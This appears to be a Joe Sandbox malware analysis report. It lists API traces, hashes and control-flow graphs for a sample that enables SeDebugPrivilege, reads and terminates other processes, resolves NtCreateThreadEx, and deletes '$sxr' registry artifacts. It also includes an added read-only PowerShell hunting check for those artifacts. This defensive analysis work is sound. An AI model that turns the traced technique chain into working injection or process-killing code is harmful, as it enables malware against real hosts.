• Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
• Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
• GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
• K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
• OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
• K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
• ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
• FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
• GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
• GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
• RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 00401219
Memory Dump Source
• Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
• String ID: pDt
• API String ID: 2178662837-1368317816
• Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
• Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
• Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
• Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• SysAllocString.OLEAUT32($sxrsvc32), ref: 004013E7
• SysAllocString.OLEAUT32(00402114), ref: 004013F1
• CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
• CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
• VariantInit.OLEAUT32(?), ref: 00401451
• CoUninitialize.OLE32 ref: 004014DE
• SysFreeString.OLEAUT32(?), ref: 004014F0
• SysFreeString.OLEAUT32(00000000), ref: 004014F3
Memory Dump Source
• Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID: $sxrsvc32
• API String ID: 4184240511-78464866
• Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
• Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
• Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
• Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                                        • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                                        • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                                        • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                                        • Part of subcall function 0040133E: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                                        • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                                        • Part of subcall function 0040133E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                      • RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Heap$Open$TokenValue$AdjustAllocChangeCloseCurrentDeleteErrorFindFreeLastLookupNotificationPrivilegePrivileges
                                                                                                                      • String ID: $sxrstager$SOFTWARE
                                                                                                                      • API String ID: 2353213234-1606840681
                                                                                                                      • Opcode ID: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                                      • Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
                                                                                                                      • Opcode Fuzzy Hash: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                                      • Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                       Control-flow graph (rendered image not extracted; basic blocks and edges recovered from the page):
                                                                                                                         401292-4012c0  GetProcessHeap, HeapAlloc, call 401081  -> 4012c2 / 40130c
                                                                                                                         4012c2-4012c8  -> 4012ca / 40130b
                                                                                                                         4012ca-4012cb  -> 4012cd
                                                                                                                         4012cd-4012d6  loop head  -> 401302 / 4012d8
                                                                                                                         4012d8-4012db  -> 401302 / 4012dd
                                                                                                                         4012dd-4012ee  OpenProcess  -> 401302 / 4012f0
                                                                                                                         4012f0-4012fc  TerminateProcess, CloseHandle  -> 401302
                                                                                                                         401302-401308  loop step  -> 4012cd / 40130a
                                                                                                                         40130a -> 40130b -> 40130c
                                                                                                                         40130c-40131e  GetProcessHeap, RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                                        • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                                        • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                                        • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                                        • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                                        • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                                        • Part of subcall function 00401081: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                                        • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                                        • Part of subcall function 00401081: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040120C
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
                                                                                                                      • CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1088988999-0
                                                                                                                      • Opcode ID: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                                      • Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
                                                                                                                      • Opcode Fuzzy Hash: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                                      • Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                       Control-flow graph (rendered image not extracted; single basic block recovered from the page):
                                                                                                                         4014fc-401502  call 401509, ExitProcess
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401509: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                                        • Part of subcall function 00401509: RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                                        • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                                        • Part of subcall function 00401509: HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                                        • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                                        • Part of subcall function 00401509: RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                                      • ExitProcess.KERNEL32 ref: 00401502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocDeleteExitFreeOpenValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3703222776-0
                                                                                                                      • Opcode ID: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                                      • Instruction ID: d57de1a7dd692de033d0a6d08cf0830a53249df09c6425f09644fba4c2c840d6
                                                                                                                      • Opcode Fuzzy Hash: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
                                                                                                                      • RegDeleteKeyW.ADVAPI32(000003E8,?), ref: 00401038
                                                                                                                      • RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
                                                                                                                      • RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
                                                                                                                      • RegDeleteKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig
                                                                                                                      • API String ID: 3013565938-435319591
                                                                                                                      • Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
                                                                                                                      • Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                                      • Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
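
The two registry routines traced above are the most usable host artifacts on this page: one opens HKLM\SOFTWARE (0x80000002 is HKEY_LOCAL_MACHINE) and deletes the value `$sxrstager` with RegDeleteValueW; the other opens HKLM\SOFTWARE\$sxrconfig, walks its subkeys with RegEnumKeyExW/RegDeleteKeyW and finally removes the key with RegDeleteKeyExW. The PowerShell below is an added hunting check written for this page; it is not part of the Joe Sandbox report or of the sample, and the function name is ours. It queries both registry views because the access masks on the page decode to KEY_ALL_ACCESS | KEY_WOW64_64KEY (0x000F013F) for the $sxrconfig key and KEY_ALL_ACCESS | KEY_WOW64_32KEY (0x000F023F) for the SOFTWARE key, so a 32-bit process on 64-bit Windows may have used HKLM\SOFTWARE\WOW6432Node for the value. Note that these functions only delete the artifacts; the code that creates them is not shown on this page, so an empty result is not evidence of a clean host.

```powershell
# Added hunting check for the registry artifacts traced in this report.
# Not part of the Joe Sandbox output or of the sample. Run from an elevated PowerShell.
# Artifacts taken from the API traces above:
#   key    HKLM\SOFTWARE\$sxrconfig     (RegOpenKeyExW / RegEnumKeyExW / RegDeleteKeyW / RegDeleteKeyExW)
#   value  HKLM\SOFTWARE : $sxrstager   (RegOpenKeyExW("SOFTWARE") / RegDeleteValueW)
# The '$' is literal in both names; single quotes keep PowerShell from expanding it.

function Find-SxrRegistryArtifacts {
    # Both registry views: the page's access masks 0x000F013F and 0x000F023F are
    # KEY_ALL_ACCESS | KEY_WOW64_64KEY and KEY_ALL_ACCESS | KEY_WOW64_32KEY, so a
    # 32-bit process on x64 may have written the value under HKLM\SOFTWARE\WOW6432Node.
    $roots     = @('HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node')
    $keyName   = '$sxrconfig'
    $valueName = '$sxrstager'
    $findings  = @()

    foreach ($root in $roots) {
        # WOW6432Node does not exist on 32-bit hosts; skip it quietly there.
        if (-not (Test-Path -LiteralPath $root)) { continue }

        # 1. The key the sample deletes recursively, plus the subkeys its RegEnumKeyExW loop would walk.
        $keyPath = Join-Path $root $keyName
        if (Test-Path -LiteralPath $keyPath) {
            $findings += [pscustomobject]@{ Kind = 'Key'; Path = $keyPath; Data = $null }
            foreach ($sub in Get-ChildItem -LiteralPath $keyPath -Recurse -ErrorAction SilentlyContinue) {
                $findings += [pscustomobject]@{ Kind = 'Subkey'; Path = $sub.Name; Data = $null }
            }
        }

        # 2. The value the sample removes with RegDeleteValueW directly under HKLM\SOFTWARE.
        $rootKey = Get-Item -LiteralPath $root
        if ($rootKey.GetValueNames() -contains $valueName) {
            $findings += [pscustomobject]@{
                Kind = 'Value'
                Path = "$root : $valueName"
                Data = $rootKey.GetValue($valueName)
            }
        }
    }
    return $findings
}

$hits = @(Find-SxrRegistryArtifacts)
if ($hits.Count -eq 0) {
    Write-Output 'No $sxrconfig key or $sxrstager value found in either registry view.'
} else {
    $hits | Format-Table -AutoSize
}
```

Any hit should be exported (reg export) before remediation, since the value data and subkey names are what the report does not show and are the only lead to whatever wrote them.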

                                                                                                                      Control-flow Graph

                                                                                                                       Control-flow graph (rendered image not extracted; basic blocks and edges recovered from the page):
                                                                                                                         40131f-40132c  GetModuleHandleA  -> 40133b / 40132e
                                                                                                                         40132e-40133a  GetProcAddress  -> 40133b
                                                                                                                         40133b-40133d  return
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                                      • API String ID: 1646373207-690569937
                                                                                                                      • Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
                                                                                                                      • Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                                      • Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:40.9%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:88
                                                                                                                      Total number of Limit Nodes:13
                                                                                                                       Execution graph (rendered image not extracted; API calls recovered from the node list, grouped by code region):
                                                                                                                         20d0b62a608-20d0b62db28 (CRT-style startup helpers, including Concurrency::details::SchedulerProxy::DeleteThis): HeapFree, LoadLibraryExW, GetProcAddress, _invalid_parameter_noinfo, GetStdHandle, GetFileType, GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW
                                                                                                                         7ff6154f3240-7ff61550ebfc (inside the $sxr-cmd image mapped at 00007FF6154F0000): Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage, GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale, VirtualQuery, GetConsoleOutputCP, GetCPInfo, memset, _setjmp, _setmode, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetProcAddress, SetThreadLocale
                                                                                                                         20d0b5f29a0-20d0b5f2b3f: VirtualAlloc, LoadLibraryA
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                      • API String ID: 3305344409-4288247545
                                                                                                                      • Opcode ID: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
                                                                                                                      • Instruction ID: f83e602e50128556b9bf9fe6c6e1fdafb5d2944b68d106f594f012e56501c76f
                                                                                                                      • Opcode Fuzzy Hash: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
                                                                                                                      • Instruction Fuzzy Hash: 71429039A08E8285EB649B2198502B9F7A1EF85FB8F444236D95EC77F5DF3CE9458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 216 7ff6154faa54-7ff6154faa98 call 7ff6154fcd90 219 7ff61550bf5a-7ff61550bf70 call 7ff615504c1c call 7ff6154fff70 216->219 220 7ff6154faa9e 216->220 221 7ff6154faaa5-7ff6154faaa8 220->221 223 7ff6154facde-7ff6154fad00 221->223 224 7ff6154faaae-7ff6154faac8 wcschr 221->224 230 7ff6154fad06 223->230 224->223 227 7ff6154faace-7ff6154faae9 towlower 224->227 227->223 229 7ff6154faaef-7ff6154faaf3 227->229 233 7ff61550beb7-7ff61550bec4 call 7ff61551eaf0 229->233 234 7ff6154faaf9-7ff6154faafd 229->234 231 7ff6154fad0d-7ff6154fad1f 230->231 237 7ff6154fad22-7ff6154fad2a call 7ff6155013e0 231->237 246 7ff61550bec6-7ff61550bed8 call 7ff6154f3240 233->246 247 7ff61550bf43-7ff61550bf59 call 7ff615504c1c 233->247 235 7ff6154fab03-7ff6154fab07 234->235 236 7ff61550bbcf 234->236 239 7ff6154fab7d-7ff6154fab81 235->239 240 7ff6154fab09-7ff6154fab0d 235->240 249 7ff61550bbde 236->249 237->221 244 7ff61550be63 239->244 248 7ff6154fab87-7ff6154fab95 239->248 243 7ff6154fab13-7ff6154fab17 240->243 240->244 243->239 250 7ff6154fab19-7ff6154fab1d 243->250 255 7ff61550be72-7ff61550be88 call 7ff6154f3278 call 7ff615504c1c 244->255 246->247 263 7ff61550beda-7ff61550bee9 call 7ff6154f3240 246->263 247->219 253 7ff6154fab98-7ff6154faba0 248->253 259 7ff61550bbea-7ff61550bbec 249->259 250->249 254 7ff6154fab23-7ff6154fab27 250->254 253->253 258 7ff6154faba2-7ff6154fabb3 call 7ff6154fcd90 253->258 254->259 261 7ff6154fab2d-7ff6154fab31 254->261 283 7ff61550be89-7ff61550be8c 255->283 258->219 269 7ff6154fabb9-7ff6154fabde call 7ff6155013e0 call 7ff6155033a8 258->269 265 7ff61550bbf8-7ff61550bc01 259->265 261->230 266 7ff6154fab37-7ff6154fab3b 261->266 277 7ff61550beeb-7ff61550bef1 263->277 278 7ff61550bef3-7ff61550bef9 263->278 265->231 266->265 270 7ff6154fab41-7ff6154fab45 266->270 305 7ff6154fac75 269->305 306 7ff6154fabe4-7ff6154fabe7 269->306 274 
7ff61550bc06-7ff61550bc2a call 7ff6155013e0 270->274 275 7ff6154fab4b-7ff6154fab4f 270->275 294 7ff61550bc5a-7ff61550bc61 274->294 295 7ff61550bc2c-7ff61550bc4c _wcsnicmp 274->295 281 7ff6154fab55-7ff6154fab78 call 7ff6155013e0 275->281 282 7ff6154fad2f-7ff6154fad33 275->282 277->247 277->278 278->247 284 7ff61550befb-7ff61550bf0d call 7ff6154f3240 278->284 281->221 288 7ff61550bc66-7ff61550bc8a call 7ff6155013e0 282->288 289 7ff6154fad39-7ff6154fad3d 282->289 291 7ff6154facbe 283->291 292 7ff61550be92-7ff61550beaa call 7ff6154f3278 call 7ff615504c1c 283->292 284->247 303 7ff61550bf0f-7ff61550bf21 call 7ff6154f3240 284->303 324 7ff61550bc8c-7ff61550bcaa _wcsnicmp 288->324 325 7ff61550bcc4-7ff61550bcdc 288->325 297 7ff6154fad43-7ff6154fad49 289->297 298 7ff61550bcde-7ff61550bd02 call 7ff6155013e0 289->298 301 7ff6154facc0-7ff6154facc7 291->301 337 7ff61550beab-7ff61550beb6 call 7ff615504c1c 292->337 309 7ff61550bd31-7ff61550bd4f _wcsnicmp 294->309 295->294 304 7ff61550bc4e-7ff61550bc55 295->304 307 7ff6154fad4f-7ff6154fad68 297->307 308 7ff61550bd5e-7ff61550bd65 297->308 328 7ff61550bd2a 298->328 329 7ff61550bd04-7ff61550bd24 _wcsnicmp 298->329 301->301 311 7ff6154facc9-7ff6154facda 301->311 303->247 339 7ff61550bf23-7ff61550bf35 call 7ff6154f3240 303->339 319 7ff61550bbb3-7ff61550bbb7 304->319 316 7ff6154fac77-7ff6154fac7f 305->316 306->291 321 7ff6154fabed-7ff6154fac0b call 7ff6154fcd90 * 2 306->321 322 7ff6154fad6d-7ff6154fad70 307->322 323 7ff6154fad6a 307->323 308->307 320 7ff61550bd6b-7ff61550bd73 308->320 317 7ff61550bbc2-7ff61550bbca 309->317 318 7ff61550bd55 309->318 311->223 316->291 335 7ff6154fac81-7ff6154fac85 316->335 317->221 318->308 330 7ff61550bbba-7ff61550bbbd call 7ff6155013e0 319->330 331 7ff61550bd79-7ff61550bd8b iswxdigit 320->331 332 7ff61550be4a-7ff61550be5e 320->332 321->337 356 7ff6154fac11-7ff6154fac14 321->356 322->237 323->322 324->325 336 7ff61550bcac-7ff61550bcbf 324->336 325->309 328->309 329->328 338 7ff61550bbac 329->338 330->317 
331->332 342 7ff61550bd91-7ff61550bda3 iswxdigit 331->342 332->330 340 7ff6154fac88-7ff6154fac8f 335->340 336->319 337->233 338->319 339->247 357 7ff61550bf37-7ff61550bf3e call 7ff6154f3240 339->357 340->340 348 7ff6154fac91-7ff6154fac94 340->348 342->332 345 7ff61550bda9-7ff61550bdbb iswxdigit 342->345 345->332 352 7ff61550bdc1-7ff61550bdd7 iswdigit 345->352 348->291 351 7ff6154fac96-7ff6154facaa wcsrchr 348->351 351->291 358 7ff6154facac-7ff6154facb9 call 7ff615501300 351->358 354 7ff61550bdd9-7ff61550bddd 352->354 355 7ff61550bddf-7ff61550bdeb towlower 352->355 361 7ff61550bdee-7ff61550be0f iswdigit 354->361 355->361 356->337 362 7ff6154fac1a-7ff6154fac33 memset 356->362 357->247 358->291 363 7ff61550be17-7ff61550be23 towlower 361->363 364 7ff61550be11-7ff61550be15 361->364 362->305 365 7ff6154fac35-7ff6154fac4b wcschr 362->365 366 7ff61550be26-7ff61550be45 call 7ff6155013e0 363->366 364->366 365->305 367 7ff6154fac4d-7ff6154fac54 365->367 366->332 368 7ff6154fad72-7ff6154fad91 wcschr 367->368 369 7ff6154fac5a-7ff6154fac6f wcschr 367->369 371 7ff6154faf03-7ff6154faf07 368->371 372 7ff6154fad97-7ff6154fadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff6154fadb2-7ff6154fadc7 wcschr 372->373 373->371 374 7ff6154fadcd-7ff6154fade2 wcschr 373->374 374->371 375 7ff6154fade8-7ff6154fadfd wcschr 374->375 375->371 376 7ff6154fae03-7ff6154fae18 wcschr 375->376 376->371 377 7ff6154fae1e-7ff6154fae21 376->377 378 7ff6154fae24-7ff6154fae27 377->378 378->371 379 7ff6154fae2d-7ff6154fae40 iswspace 378->379 380 7ff6154fae42-7ff6154fae49 379->380 381 7ff6154fae4b-7ff6154fae5e 379->381 380->378 382 7ff6154fae66-7ff6154fae6d 381->382 382->382 383 7ff6154fae6f-7ff6154fae77 382->383 383->255 384 7ff6154fae7d-7ff6154fae97 call 7ff6155013e0 383->384 387 7ff6154fae9a-7ff6154faea4 384->387 388 7ff6154faebc-7ff6154faef8 call 7ff615500a6c call 7ff6154fff70 * 2 387->388 389 7ff6154faea6-7ff6154faead 387->389 388->316 397 7ff6154faefe 388->397 389->388 390 
7ff6154faeaf-7ff6154faeba 389->390 390->387 390->388 397->283
                                                                                                                       Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
